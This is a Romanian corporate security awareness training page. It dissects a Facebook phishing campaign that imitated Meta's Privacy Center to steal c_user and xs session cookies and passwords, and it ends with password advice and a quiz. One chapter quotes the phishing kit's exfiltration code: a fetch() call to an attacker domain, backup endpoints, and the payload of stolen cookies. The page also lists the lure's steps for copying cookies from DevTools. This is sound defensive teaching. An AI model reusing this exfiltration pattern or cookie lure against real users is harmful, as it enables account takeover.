Security Awareness Training

Capitolul 01

Ce a primit Doamna Tatiana pe Facebook

O postare pe pagina Caravana VEEDA de la un cont numit "Warning: Policy Infraction" care parea sa vina de la Facebook. Arata oficial, folosea termeni tehnici, si cerea actiune urgenta.

Pasul 1: Postarea primita

POSTARE FALSA

Ce scrie in postare:

⚠ "Important Notice: Page Policy Review"

Termenii folositi ca sa para oficial:

Intellectual Property Compliance
= "Conformitatea cu proprietatea intelectuala"
Community Standards Review
= "Revizuirea standardelor comunitare" — adica postari care ar incalca regulile
Sensitive Content Assessment
= "Evaluarea continutului sensibil"

⚠ Toate sunt inventate. Facebook nu comunica asa. Termenii par oficiali dar sunt pusi intentionat ca sa te intimideze si sa nu pui intrebari.

Pasul 2: Cine a trimis postarea?

MOUSE HOVER

Ce se vede cand tii mouse-ul pe numele paginii:

!
Pagina se numeste "Warning: Policy Infraction" — nu e o pagina oficiala Facebook
!
Categoria: "Digital creator" — nu "Facebook Official" sau "Meta"
!
Descrierea e in spaniola: "Bienvenidos a Trabajo Inteligente..." — o pagina despre ustensile de bucatarie!
!
Are doar 1K followers — Facebook oficial are sute de milioane

💡 Trucul: Atacatorii si-au pus logo-ul Facebook si un nume oficial ca poza de profil. La prima vedere pare de la Facebook, dar cand inspectezi — e o pagina random.

Pasul 3: Pagina atacatorului pe Facebook

PAGINA ATACATORULUI

Ce vedem cand dam click pe pagina lor:

!
Pagina e plina cu postari identice trimise la zeci de alte victime — nu doar la noi
!
Fiecare postare contine aceleasi amenintari: "Page Deletion Scheduled", "Policy Infraction"
!
Link-ul de phishing e mereu in comentarii, nu in postare — ca sa evite filtrele Facebook
✓
Pagina e inca activa pe Facebook — ceea ce arata cat de greu e sa fie detectate

🔎 Lectie: Intotdeauna verifica CINE posteaza. Da click pe numele paginii si uita-te la istoricul lor. Daca vezi zeci de mesaje identice catre pagini diferite — e clar scam.

Pasul 4: Unde ducea link-ul din comentariu

PAGINA DE PHISHING

Ce vede victima daca da click:

!
O copie falsa a "Privacy Center" Meta — cu logo, meniu, design profesionist
!
"Your page is scheduled to be deleted!" — panica si urgenta
!
Un formular de "Appeal" care cere cookie-uri tehnice (c_user, xs)
!
Un video tutorial care te "invata" cum sa extragi datele din browser
!
Dupa cookie-uri, iti cere si parola de Facebook

⚠ Totul e fals. Facebook nu iti va cere niciodata cookie-uri sau sa deschizi Developer Tools. Niciodata.

Capitolul 02

Semnalele de alarma (Red Flags)

Daca stii unde sa te uiti, atacul devine evident. Iata semnalele de alarma:

ANALIZA

🌐

1. URL-ul nu e de la Facebook

Adresa reala: submit-for-application-request.surge.sh
Domeniul real Meta ar fi facebook.com sau meta.com. Surge.sh e un serviciu de hosting gratuit folosit de oricine.

🔒

2. Cere cookie-uri tehnice

Campurile c_user si xs sunt cookie-uri de autentificare Facebook. Nicio companie reala nu iti cere asta - e ca si cum ai da cheia de la casa.

🎬

3. Video "tutorial" suspect

Te "invata" cum sa deschizi Developer Tools si sa copiezi cookie-uri. O companie reala nu te-ar pune niciodata sa faci asta. E ca si cum banca ti-ar zice "deschide seiful si da-ne codul".

⏱

4. Urgenta falsa

"Pagina ta va fi stearsa!" - atacatorii creeaza panica intentionat. Cand esti speriat, nu mai gandesti rational si actionezi impulsiv. Exact asta vor.

🔐

5. Cere parola dupa cookie-uri

Dupa ce introduci cookie-urile, apare un al doilea formular care cere parola de Facebook. De ce ar avea nevoie de ambele? Pentru ca vor acces total si permanent.

🇧

6. Multilingv = targetare in masa

Pagina are suport pentru 9+ limbi (engleza, hindi, araba, spaniola, etc). E o operatiune de phishing in masa, nu un mesaj personalizat de la Meta.

Capitolul 03

Cum functioneaza atacul

Pas cu pas, de la mesajul primit pana la contul furat:

📩

1. Mesaj pe Facebook

Victima primeste un mesaj
"pagina ta va fi stearsa"

⟶

🌐

2. Pagina falsa

Click pe link duce la o
copie falsa Meta/Facebook

⟶

📝

3. Formular "appeal"

Victima introduce cookie-uri
c_user + xs + parola

⟶

🕷

4. Date la atacator

Totul e trimis la servere
controlate de atacator

⟶

💀

5. Cont preluat

Atacatorul are acces total
la contul tau Facebook

Ce sunt cookie-urile c_user si xs?

Cand te loghezi pe Facebook, browser-ul primeste niste "biletele de acces" numite cookie-uri. Doua dintre ele sunt critice:

!
c_user = ID-ul tau de utilizator Facebook (cine esti)
!
xs = token-ul de sesiune (dovada ca esti logat)

🔑 Cu aceste doua valori, atacatorul poate intra in contul tau fara parola si fara 2FA. E ca si cum ai da pe cineva cheia de la casa - nu mai are nevoie sa sparga usa.

Unde ajung datele tale?

Codul din pagina de phishing trimite datele furate catre 3 servere diferite ale atacatorului, ca backup:

// Serverul principal al atacatorului:
fetch('https://bilalnizamani.xyz/nazeer.php')
// + alte 3 servere backup (URL-uri ascunse in cod binar):
endpoint_1: ali-php.wasmer.app
endpoint_2: awais-php.wasmer.app
endpoint_3: arzajejo.xyz
// Datele trimise cu nume de variabile jignitoare (hindi slang):
{ bhenjachud: c_user_victima, majachud: xs_victima }

Observati numele variabilelor - sunt injuraturi in Hindi. Clar nu e o companie serioasa.

Capitolul 04

Video-ul atacatorului

Atacatorii au inclus un video tutorial care "invata" victima cum sa-si extraga cookie-urile din browser. L-am salvat ca dovada:

⚠ VIDEO AL ATACATORULUI

Ce arata video-ul:

1
Deschide browser-ul si intra pe Facebook
2
Apasa F12 (Developer Tools)
3
Merge la tab-ul "Application" sau "Storage"
4
Gaseste cookie-urile c_user si xs
5
Copiaza valorile si le introduce in formularul fals

⚠ Regula de aur: Daca cineva te "invata" sa deschizi Developer Tools si sa copiezi ceva de acolo, e 100% un atac. Nicio companie legitima nu iti va cere asta vreodata.

🎬 La sfarsitul video-ului scrie:

"After submitting, do not log out from your computer until you receive a verification email."

De ce iti cer sa NU te deloghezi?

Pentru ca cookie-ul xs (token-ul de sesiune) se invalideaza in momentul in care te deloghezi. Daca te deconectezi, sesiunea furata devine inutila si atacatorul pierde accesul.

Atacatorii au nevoie de timp cat sesiunea e inca activa ca sa:

Iti schimbe parola contului
Iti schimbe adresa de email asociata
Isi adauge propriile dispozitive de incredere
Iti blocheze accesul complet si definitiv

🔑 Pe scurt: Cookie-ul c_user (ID-ul tau) ramane mereu acelasi, dar xs se schimba la fiecare logare noua. Fara xs valid = atacatorul nu mai are acces. De aia iti cer sa stai logat — le cumperi timp sa-ti fure contul.

Capitolul 05

De ce e atat de periculos

Ce poate face atacatorul cu datele furate? Mai mult decat crezi:

👤

Preia contul complet

Schimba parola, email-ul, numarul de telefon. Devii complet blocat din propriul cont.

💬

Trimite mesaje in numele tau

Poate trimite link-uri de phishing la toti prietenii si contactele tale de business. "De la tine."

💰

Acceseaza conturile de business

Facebook Business Manager, reclame, pagini de firma - toate devin accesibile atacatorului.

💳

Cheltuie bani pe reclame

Daca ai un card atasat, atacatorul ruleaza reclame de mii de euro pe contul tau — continut pornografic, scheme de imbogatire rapida, criptomonede false, produse contrafacute. Lucruri care nu au nicio legatura cu tine, dar factura vine pe numele tau — si in plus, atrage blocarea paginii de catre Facebook (cel real, de data asta) pentru incalcarea regulilor platformei.

📷

Acces la date private

Mesaje private, poze, documente trimise pe Messenger - totul devine vizibil atacatorului.

🎲

Santaj / Extorcare

Cu acces la mesaje si poze private, atacatorul te poate santaja sau poate distribui informatii sensibile.

3.4 mld

email-uri de phishing trimise zilnic in lume

83%

din companiile afectate au pierderi financiare

36%

din breach-uri incep cu un email de phishing

< 60s

e suficient ca atacatorul sa-ti preia contul

Capitolul 06

Cazul nostru real: contul de TikTok spart

Cu cateva saptamani in urma, contul nostru de TikTok a fost compromis. La "Last Logins" aparea "Unknown". Cauza exacta nu a fost identificata, dar problema de baza e clara:

🔎 Ce s-a intamplat

Contul de TikTok al companiei a fost accesat de persoane neautorizate. In jurnalul de autentificari aparea dispozitivul "Unknown" - ceea ce inseamna ca cineva din afara organizatiei s-a logat.

Cauza exacta ramane neclara, dar exista un factor de risc major care face situatia si mai grava:

Problema #1: Conturi partajate pe 10-15 calculatoare

Acelasi cont de TikTok, Facebook, etc. e logat pe 10-15 calculatoare simultan. Asta inseamna:

💻

Suprafata de atac x15

Fiecare calculator e un potential punct de intrare. Daca un singur PC e compromis (malware, extensie dubioasa, phishing), atacatorul are acces la TOATE conturile.

🔍

Imposibil de auditat

Cand 15 oameni folosesc acelasi cont, nu poti stii CINE a facut o actiune. Cine a dat click pe link-ul gresit? Cine a instalat extensia aia?

🔓

O parola = 15 sanse de leak

Daca un angajat noteaza parola pe un sticky note, o trimite pe WhatsApp, sau o foloseste si pe alte site-uri compromise - contul e expus.

🚫

Nu poti revoca accesul individual

Daca un angajat pleaca din firma, trebuie sa schimbi parola pentru TOATA lumea. Dar asta inseamna ca unii colegi care nu au fost instiintati la timp raman brusc fara acces — si apar intarzieri la reclame, post-uri, marketing, raspunsuri la comentarii. Iar intrebarea reala e: se schimba mereu parola la toate conturile cand cineva cu acces pleaca din firma? De cele mai multe ori - probabil ca nu.

💡 Solutia: Fiecare angajat ar trebui sa aiba contul sau propriu, cu drepturi specifice (admin, editor, viewer). Platformele majore (Facebook Business, TikTok Business) permit management de echipa cu roluri separate. Asa, daca un cont e compromis, afecteaza doar acea persoana, nu toata firma.

Capitolul 07

Tipuri de atacuri pe care le vei intalni

Phishing-ul cu "Privacy Center" e doar un tip. Iata cele mai frecvente atacuri:

🎣

Phishing clasic

Pagini false care imita site-uri cunoscute (Facebook, banca, email). Scopul: sa introduci date de autentificare, sa le dai anumite coduri de securitate pe care le primesti odata ce se fac modificari, etc.

"Contul dumneavoastra a fost blocat. Verificati identitatea aici: [link suspect]"

📨

Spear Phishing

Atacuri personalizate, cu informatii despre tine sau compania ta. Mult mai greu de detectat pentru ca par mesaje reale de la colegi sau parteneri. Aceste mesaje chiar sunt greu de detectat, mai ales daca persoana vizata nu are cunostinte despre aceste metode, asa ca fiti atenti la orice mesaj de genul.

"Buna, sunt Dorin de la IT. Trebuie sa iti resetam contul de email si parola. Te rog acceseaza link-ul asta si introdu parola curenta apoi pe cea noua.. [link]"

📱

Smishing (SMS Phishing)

Aceleasi tehnici, dar prin SMS. Mesaje de la "banca", "curier", sau "ANAF" cu link-uri false.

"Coletul dumneavoastra nu a putut fi livrat. Reprogramati livrarea: [link]"

"ANAF: Aveti o restanta fiscala. Platiti in 24h pentru a evita penalitati: [link]"

"BT/ING/BCR: Tranzactie suspecta pe contul dvs. Confirmati sau blocati: [link]"

"Ai castigat un voucher eMAG de 500 lei! Revendica-l aici: [link]"

📞

Vishing (Voice Phishing)

Apeluri telefonice de la "banca", "politie", sau "suport tehnic" care cer date personale sau acces remote pe calculator.

"Buna ziua, sunt de la departamentul de frauda. Am detectat o tranzactie suspecta..."

💰

Business Email Compromise

Atacatorul se da drept seful sau un partener de business si cere transferuri bancare urgente. Pierderile pot fi de mii-zeci de mii de euro.

"Te rog plateste urgent aceasta factura. Am schimbat contul bancar. E urgent!"

🔒

Ransomware / Malware prin Phishing

Aici as vrea sa intru putin mai in detalii. Puteti primi email-uri cu atasamente infectate (facturi, CV-uri, documente). Deschizi fisierul si calculatorul e criptat — cer bani pentru deblocare. Sau pur si simplu deschizi fisierul si atacatorul are acces total la calculatorul sau dispozitivul tau. Apoi pot face tranzactii in numele tau prin fel si fel de metode.

Este foarte important sa nu downloadati si apoi sa rulati fisiere care se termina in:

.exe (program executabil - cel mai periculos, ruleaza pe calculatorul tau si poate face orice) • .zip / .rar (arhive — pot ascunde executabile) • .js (script JavaScript) • .bat / .cmd (comenzi Windows) • .scr (screensaver fals) • .msi (program de instalare) • .vbs (script Visual Basic) • .docm / .xlsm (Word/Excel cu macros — ATENTIE: fisierele normale de Word si Excel se termina in .docx si .xlsx si sunt sigure. Cele cu "m" la sfarsit (.docm, .xlsm) contin cod care poate rula automat pe calculatorul vostru. Daca primiti un fisier Word/Excel si va cere sa "Activati macros" sau "Enable Content" — NU apasati)

"Va atasam factura proforma pentru luna curenta." [fisier .zip sau .exe]

Capitolul 08

Cum te protejezi 🛡

Regulile de aur ale securitatii online. Simplu de aplicat, extrem de eficiente:

1

🔎 Verifica INTOTDEAUNA URL-ul

Inainte sa introduci orice date, uita-te la adresa din browser. facebook.com e sigur. facebook-security-center.xyz nu e. Daca nu esti sigur, tasteaza manual adresa site-ului in browser.

2

🔒 Activeaza 2FA (Two-Factor Authentication)

Chiar daca cineva iti afla parola, nu poate intra fara codul de pe telefonul tau. Activeaz-o pe TOATE conturile: Facebook, TikTok, email, banca.

3

🚫 Atentie la link-urile din mesaje

Nu orice link e periculos — primim link-uri legitime zilnic. Dar fii suspicios cand: mesajul vine de la cineva necunoscut, creeaza urgenta sau panica ("contul va fi sters!", "plateste acum!"), vine pe Messenger/SMS de la un numar/cont pe care nu-l recunosti, sau iti cere sa introduci parole, coduri, sau date personale. In aceste cazuri, NU da click — du-te direct pe site-ul oficial (tasteaza adresa manual in browser) si verifica daca chiar exista o problema, sau verifica-ti emailul daca ai primit un email oficial cu problema respectiva.

4

🔐 Parole unice si puternice

Folositi parole puternice — cat mai lungi, cu litere mari si mici, cifre si caractere speciale. Evitati numele copiilor, datele de nastere, sau parole simple gen "123456". Si incercati sa nu folositi aceeasi parola pe mai multe conturi — daca un cont e spart, toate sunt expuse.

5

💻 Un cont per persoana

Nu mai partajati conturi! Fiecare angajat trebuie sa aiba propriul cont cu rolul potrivit. Daca un cont e spart, afecteaza doar o persoana.

6

⚠ Raporteaza imediat

Daca ai dat click pe ceva suspect sau ai introdus date undeva dubios, spune imediat. Cu cat actionam mai repede, cu atat paguba e mai mica. Nu te judeca nimeni.

7

💾 Atentie la atasamente

Nu deschide fisiere .exe, .zip, .js, .scr primite pe email sau messenger. Chiar daca par sa vina de la cineva cunoscut - contul lor poate fi compromis.

8

🔄 Actualizeaza totul

Tine browser-ul, sistemul de operare si aplicatiile la zi. Actualizarile rezolva vulnerabilitati pe care atacatorii le pot exploata.

Pagina reala vs. pagina falsa - cum le deosebesti?

🔴 Pagina FALSA (Phishing)	🟢 Pagina REALA
URL ciudat: security-fb-appeal.surge.sh	URL oficial: facebook.com/help
Cere cookie-uri, token-uri, coduri din browser	Nu iti cere niciodata sa deschizi Developer Tools
"Contul va fi sters in 24h!" - urgenta extrema	Notificari calme, cu timp suficient de reactie
Link primit pe Messenger/SMS de la straini	Notificari in platforma, la sectiunea de setari
Greseli gramaticale, caractere ciudate	Text profesional, corect gramatical
Cere parola dupa ce ai dat deja alte date	Un singur formular de login, pe domeniul oficial

Capitolul 09

Parole: prima linie de aparare

O parola slaba e ca o usa din carton. Testeaza aici cat de puternica e parola ta:

🔐 Testeaza puterea parolei tale

Parola nu este salvata sau trimisa nicaieri. Test 100% local.

Scrie o parola ca sa vezi cat de puternica e

✓

Minim 12 caractere

✓

Litere mari (A-Z)

✓

Litere mici (a-z)

✓

Cifre (0-9)

✓

Caractere speciale (!@#$)

✓

Nu e o parola comuna

Cele mai proaste parole (pe care oamenii inca le folosesc):

123456 - sparta in < 1 secunda
password - sparta in < 1 secunda
qwerty123 - sparta in 1 secunda
admin123 - sparta in 1 secunda
iloveyou - sparta in 3 secunde
NumeleFirmei2024 - sparta in cateva ore
Tr0mb&ta$Albastr3!Zbor - foarte greu de spart
cal-baterie-capsuna-far - foarte greu de spart

Strategii pentru parole bune:

1
Metoda frazei: Alege o fraza memorabila si modific-o: "Cainele meu are 3 picioare!" devine C@inele.Meu_are3Pic!
2
Metoda cuvintelor random: 4 cuvinte care n-au legatura: cal-baterie-capsuna-far
3
Password Manager: Lasa software-ul sa genereze si sa tina minte parolele. Tu tii minte doar parola master.
4
Niciodata aceeasi parola pe 2 site-uri. Daca un site e spart, toate conturile tale sunt expuse.
5
Nu include informatii personale: numele, data nasterii, numele firmei, al pisicii - toate se pot ghici sau gasi online.

Capitolul 10

Testeaza-ti cunostintele 🎓

Hai sa vedem cat ai retinut. 10 intrebari, raspunsuri instant cu explicatii:

Intrebarea 1 din 10

Primesti un mesaj pe Facebook: "Pagina ta va fi stearsa in 24h. Click aici pentru a face appeal." Link-ul duce la meta-privacy-facebook.secure-link-7.com. Ce faci?

A Dau click imediat - nu vreau sa pierd pagina!

B Dau click dar nu introduc date, doar sa vad despre ce e vorba

C Ignor link-ul, merg direct pe facebook.com si verific notificarile

D Raspund la mesaj si intreb daca e real

Intrebarea 2 din 10

Ce inseamna phishing?

A Un virus care iti cripteaza fisierele

B O tentativa de a te pacali sa dai date sensibile prin mesaje false

C Un atac care iti blocheaza calculatorul

D Spam obisnuit

Intrebarea 3 din 10

Un site iti cere sa apesi F12, sa deschizi Developer Tools si sa copiezi anumite valori din sectiunea "Cookies". Ce inseamna asta?

A E o procedura normala de verificare a identitatii

B E 100% un atac - nicio companie reala nu cere asta

C Depinde de site - unele companii chiar fac asta

D E o procedura de securitate avansata

Intrebarea 4 din 10

Care dintre urmatoarele URL-uri e REAL si sigur?

A facebook-login-verify.com

B meta-security.surge.sh

C fb-support-center.com

D www.facebook.com/help

Intrebarea 5 din 10

De ce atacatorii creeaza un sentiment de urgenta ("contul va fi sters in 24h!")?

A Ca sa nu ai timp sa gandesti rational si sa verifici

B Pentru ca chiar exista un termen limita

C Ca sa para mai profesionisti

D E doar stilul lor de comunicare

Intrebarea 6 din 10

Ce e Two-Factor Authentication (2FA)?

A O parola care are doua parti

B Doua parole diferite pentru acelasi cont

C Un cod suplimentar (de pe telefon) cerut la login, pe langa parola

D Un sistem care iti schimba parola automat

Intrebarea 7 din 10

15 angajati folosesc acelasi cont de Facebook/TikTok. De ce e asta o problema?

A Nu e o problema daca parola e puternica

B Orice calculator compromis expune contul, si nu poti stii cine a facut ce

C E o problema doar daca lucreaza remote

D E ok atata timp cat au 2FA activat

Intrebarea 8 din 10

Care parola e cea mai sigura?

A NumeleFirmei2024!

B P@ssw0rd123

C qwerty!@#456

D cal-baterie-capsuna-far

Intrebarea 9 din 10

E OK sa folosesti aceeasi parola pe mai multe site-uri daca e puternica?

A Da, daca e suficient de complexa

B Nu - daca un site e spart, toate conturile tale sunt expuse

C Da, daca schimbi un caracter

D Depinde de importanta site-ului

Intrebarea 10 din 10

Ai dat click din greseala pe un link de phishing si ai introdus parola. Ce faci PRIMUL lucru?

A Schimb parola imediat si activez 2FA, apoi raportez incidentul

B Astept sa vad daca se intampla ceva suspect

C Sterg istoricul browser-ului

D Nu zic nimanui ca mi-e rusine

Ai fi cazutin plasa?